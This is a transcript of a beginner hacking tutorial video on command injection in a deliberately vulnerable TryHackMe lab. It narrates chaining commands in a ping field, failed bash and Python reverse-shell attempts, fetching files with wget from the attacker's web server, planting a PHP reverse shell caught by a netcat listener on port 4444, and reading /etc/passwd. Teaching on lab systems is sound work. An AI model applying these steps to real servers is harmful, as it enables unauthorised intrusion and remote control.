And now you can see different kind of things just like that. Welcome back again to a second video on the web application hacking series. We are going to check out the next one called command injection. Now we just came around from the brute force, and let me just log in one more time. So the brute force was all about using the burp proxy to automate our attacks. There are different ways you can do it. There's also tools you can do it with called Hydra and so on. That is for a completely different video. I do have videos about how to use Hydra and stuff like that on my channel, so you go ahead and check it out. So command injection is another interesting vulnerability on web applications that are kind of hard to, well, get into in most occasions because they're probably protected behind some sort of login. Now, depending on how they created their own login security, assuming that, you know, the login security were behind a login formula just like that with the same kind of vulnerability if we just exploited, well then the command injection one here would probably be as easy just to get through. But the general idea is that we can put in any IP address and then it will ping that. So let's take it the IP address of the box itself, just press submit and see if it works in some way, and it did. What it did here was executing a ping command. It would look something like this: ping and probably C3 or something, or C4 for the amount of, you know, packages, count packages. I guess this is a Linux server, so you would have to put a count on it, else it would ping the IP address forever. Now, the thing is with these kind of command injection input fields is that you can put in the IP. The general idea is command injection, and when you inject something, you need to know the operating system. Now, on Windows, you put in a semicolon just like that, and then you can, you know, what you call it, chain your commands in the terminal. On a Linux server, you use the piped sign just like that, which is piping the result to the next one if there's a need for that, of course. But you can also just do the pipe and do a ls just like that, and the ls will then show us the directory content. And what we see here is actually the content of the directory. We see the index file, the help folder, and the source folder. Now, we guess this is, of course, folders, but we can add on the ls tag al to get more information about this file and these directories. What we see here is that the directory help is actually a directory because it's a D on the end here, and also the D right there. So help and source is a directory. The index file itself is a file because of the dash, and you can see that the read, write, and execute rights are set to everything for the owner, everything for the group, and everything for everyone else, which is me, us, and so on. We could probably go inside the source folder or the index folder, and we can do different kind of things. Now, what we could do now, I just want to say that we actually achieved command injection. We exploited it, but you probably look at this and say, but you haven't done anything. You just showed me a directory listing. It's like, yeah. But what you could do here is put any command you would like. You could upload a file. You could, you know, get a reverse shell, which is a term I'm gonna explain in a moment. You can also do different kind of things like deleting stuff or downloading stuff from the server, altering stuff, you know. What you would really like to have is control transferred to a different, you know, way. This is a vague way of having control on the server because it's just an input field and a button, You need something more like that. If you can get, let's say, let me just assume, if you can get like a terminal connection, like you can write actual commands like I'm doing right now in the Linux terminal, if you can get that connection up and running in some way using this command injection console here, or the input field, that would be really good, which is something you can do. No, sorry for that. I'm not really sure if they on TryHackMe, they made some sort of mitigations towards me doing that, but what you could do is, and this is gonna get a bit technical, so what I'm gonna do is just show you that it's possible, and you have to work your way through the actual what is a reverse shell and how is it working. Now, just quickly explaining the word reverse shell, as I promised, is it's a way for you to get the machine you attacked establish a connection to my machine. So I am on my machine creating a listener, so I'm listening for a connection, and that connection request will be initiated by the machine that I just compromised. Alright? So a way to do that is to go to Google to do like pen tests, which is a website, Monkey, and do bash reverse shell and take that, and take the very first link here. And what you could try to do is to take this, for example, go into a editor and say, what is my IP address on this machine? So you gotta put in the IP address that is your IP address and the port you're gonna listen to. Now, in order to find your own IP address, you could go to TryHackMe just like that, and I think I can copy paste it. If I'm not able to copy paste, which is difficult sometimes, I could not. Then we remember it, 10, 11, 10. So 10, 11, 10, and 220, and I'm gonna do the port called 4444. And in order for this to work, we need to set up a listener, and the listener would be something used by Netcat. Now, Netcat is a program, it's just a thin client. So basically it's gonna listen for any incoming connection and just wait, listening on, and it's gonna be, hey, anyone is connecting to me, I will accept it. So let's take this command right there, all of it, and just go back to the application we have at hand and put that in instead of the ls. So we have the IP address and the pipe and then the bash command. Let's see if this works. So we're gonna submit this, go back to the window, and we can see that we got nothing back so far, and it doesn't really seem that this box would accept this kind of bash command. So what we could try and do, just quickly check out if my IP address is actually the one we put in, 10.11, 10.220, 10.11, 10.220 on port 4444, which is true. So there's a chance that this does not work, and we can try other ways. Also, we can do like the Netcat way, different kind of ways to use reverse shell. Now again, I want to emphasize that this is of course a machine they put up on TryHackMe, and I'm not sure what they did to make this not work. So we can just try one more time. What did it not copy? The Netcat. Alright. So let's clear it. Start the listen one more time. Go back here and check. If this is working, we would get a clear indication that we would have some sort of prediction here. So what we could do now is to check this out and say, do we have, for example, Python installed? So we're going to say with Python, and then we can check out whether this box have Python installed. And it does have Python installed. So what we could do also is just to say like, okay, so I'm going to try and use Python then to get a reverse shell. So we're going to take all of this here. and paste that in. Now I know that there's no 100% guarantee this will work because we are not concerned with that for now. What we're really concerned with is actually just the fact that we're trying things, and I'm gonna submit this now. And one more time you'll see that we got nothing back. So there's a really good chance that even though that we can ping the actual machine itself, there's something interfering with our code. Now what we could do is to go ahead and view the source. And what we see here is that it's going to use exactly how we anticipated on Linux or Windows. And I'm pretty sure this is a Linux server because we get 4 pings. It will just basically take the ping command and execute this using the shell exec. Now, in order to get this to work, we could probably take the shell exec and say like php shell exec as an execute, maybe just command injection, and go ahead and research if there's anything we need to know. So we can go to Hacktricks, which is a website, and check out if there's anything in particular we can do here. It of course got different kind of, let me just remove these things. Let's see what we can do. Can I find this somewhere? No, but we do have command injection. So it will show different kind of things. Not really anything interesting. So what we could try and do now is to download something. So let's go ahead and say, okay, so the reverse shell didn't really work, but we could create our own Python. So let's create a file called proofconcept.php, and inside of that, let's go ahead and write a small PHP script just like that and say echo hello. And then from that, let's start our own Python web server. Now what we're going to do now is the same thing as before, and we're going to wget instead http 10.11.10.220:9000, and it's going to be proofconcept.php. If this is downloaded, and we don't know for sure, but we can do that by executing the command before with the ls, and then we can actually check out what's going on, and we can see that the proof concept file is there. So we could probably go and execute it, and now we have a real file actually, executing. So what we can do is go ahead and, instead of executing a raw command, this is of course going towards beginner and more advanced. So instead of having a raw command at the bash now, probably there's a way to make this work, but I don't really want to spend time using that. We're gonna go back here and get ourselves a PHP reverse shell, which is a script that can, connect back to us. So let's go to raw and copy that and go back to our own terminal and wget that particular. I need to copy paste it correctly because of course that is still a thing. Copy pasting is difficult. There we go. Let's go into the file we just downloaded. It's called PHP reverse shell. And what we see here now is just going to scroll down a bit. Oops. I'm not touching the keyboard. Alright. I think we scrolled far enough. Okay. So what we see here is the IP address we need to fill in. It's going to be ours. And the port we're going to listen to, just like before, Why is it so slow today? Anyways, 4444. Save it. Now let's go ahead and just, rename it to s.php. Let's go ahead and start our Python website one more time. Now, if you're now thinking, okay, so you did a lot of things, this is not beginner friendly, is it? Is it not? Well, we kind of already proved command injection, so that kind of ended the beginner stage, but now I'm showing you how to use it to get an actual connection to the server. So we're basically just going back here, and let's go ahead and execute the same command as before. Let's see if we have it. We don't, so let's go see wget. Oh, we do. And it's called s.php. So the trick now is to go ahead here and start your Netcat listener, listen to port 4444, go to the website and pick s.php. As you noticed, it is hanging now in the browser tab, which means that we have a connection back here. And now we have successfully obtained a connection to the server. And we can go ahead and type ID. We are .data. We can also do who am I. And now we can begin to further exploit. What we have here is an actual shell to the machine. We can go ahead and check out what all this is. What is in the home folder? Ubuntu. So there's an Ubuntu user with an SSH profile. So let's go into SSH. You can't go to SSH because it's only Ubuntu. Right. So we are not currently that kind of user. So we would need to figure out a way to get access. Now I think this is already enough, but we have access to the server right now. I'm gonna close down this now and say we don't want access anymore. So we proved command injection. I took it a step further. Just by doing this ls, you can execute a command and see stuff. You can also go ahead and say like I want to see etc pass w, so I want to see which kind of users is on the system, and now you can see different kind of things just like that, and so many things you can go ahead and try and see if you can get access to. This is command injection in its finest shape, and I showed you different kind of things you can do, different kind of levels, and it's no shame if you cannot follow on the last bit. It was a bit fast and was a bit too much knowledge probably for beginner, but eventually if you continue, go back and watch the video again and you will get it, I promise you. So until next time, I'm gonna see you again, have a really nice day and say bye bye.